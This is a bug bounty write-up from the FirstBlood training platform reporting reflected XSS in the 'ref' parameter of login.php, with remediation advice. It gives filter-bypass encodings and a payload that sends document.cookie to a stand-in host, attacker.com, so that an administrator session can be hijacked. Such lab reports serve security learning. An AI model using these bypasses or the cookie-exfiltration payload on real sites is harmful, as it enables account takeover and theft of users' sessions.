FirstBlood-#154 — Reflective XSS on /login.php endpoint through the vulnerable `ref` parameter
This issue was discovered on FirstBlood v1
On 2021-05-10, holybugx Level 5 reported:
Description
Hello Sean,
I found out that there is a reflected XSS on the /login.php
endpoint through the vulnerable ref
parameter which leads to account takeover.
Steps to reproduce
- Open the following link:
http://firstbloodhackers.com/login.php?action=login&ref=ja%09vascript:confirm`1`
- Click on the
Return to previous page
and the XSS pops-up:
![](https://res.cloudinary.com/bugbountynotes/image/upload/v1620683349/zbcyj3nujjckq3co59cf.png)
Filter bypass
I found out that certain keywords are being blocked and removed, I realized javascript
keyword is being removed so I tried couple of encoding tricks such as java%09script
but then I realized using this payload java
keyword is removed, also realized alert
keyword and (
are being removed.
I used the following tricks to bypass the filtering:
javascript
--> ja%09vascript
alert
--> confirm
( )
--> ``
Bypass explanation
- You can use multiple encoding/unicoding tricks to bypass the
javascript
keyword being removed, an example of such is:
ja%09vascript
ja%0avascript
ja%0dvascript
-
You can use confirm
or prompt
if keywords such as alert
is blocked.
-
When parentheses are filtered you can either use ` `
as I did, or in some cases you can use encoding tricks such as HTML encode or URL encoding/Double URL encoding.
confirm(1) --> confirm`1`
Exploitation
An attacker can craft a payload to steal cookies, an example of such payload is:
http://firstbloodhackers.com/login.php?ref=ja%09vascript:window.location.href=%60http://attacker.com/$%7Bdocument.cookie%7D%60
Where http://attacker.com
is the attacker's domain, opening the above link and clicking on the Return to previous page
results in a redirection to the attacker's domain and the cookies will be sent to the attacker's server.
![](https://res.cloudinary.com/bugbountynotes/image/upload/v1620687028/bj1nasw8ulgiwehx0hbt.png)
An attacker can set this cookie on his browser to access drAdmin
(Administrator).
This happens because of two cookies misconfiguration:
-
Cookies are not set as httponly
which makes it possible for an attacker to steal cookies using javascript.
-
Cookies are not deleted/expired as they meant to be after logging out, which makes it possible for an attacker to re-use the cookies whenever he wants to.
Set-Cookie: drps=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Remediation
- The
ref
parameter should not be controlled by users.
- Preferably set
httponly
cookies so that javascript can not be used to steal cookies.
Impact
- Account takeover
Best regards,
HolyBugx
P3 Medium
Parameter:
Payload:
FirstBlood ID: 3
Vulnerability Type: Reflective XSS
The parameter "ref" is vulnerable to XSS on login.php. The developer has tried to prevent a malicious actor from redirecting to a javascript URI but the attempt to stop this was poor and thus it can be bypassed.